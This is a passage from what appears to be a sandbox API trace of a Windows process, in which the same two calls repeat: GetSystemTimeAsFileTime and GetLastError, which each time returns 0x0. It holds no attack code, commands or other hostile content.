GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.904] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.904] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18748b90, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.905] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.905] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.906] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.906] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.907] GetLastError () returned 0x0 [0201.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.908] GetLastError () returned 0x0 [0201.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x1876ecf0, dwHighDateTime=0x1d4be3b)) [0201.908] GetLastError () returned 0x0 [0202.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.123] GetLastError () returned 0x0 [0202.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.123] GetLastError () returned 0x0 [0202.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.123] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.124] GetLastError () returned 0x0 [0202.124] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.125] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.126] GetLastError () returned 0x0 [0202.126] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () returned 0x0 [0202.127] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x18984030, dwHighDateTime=0x1d4be3b)) [0202.127] GetLastError () 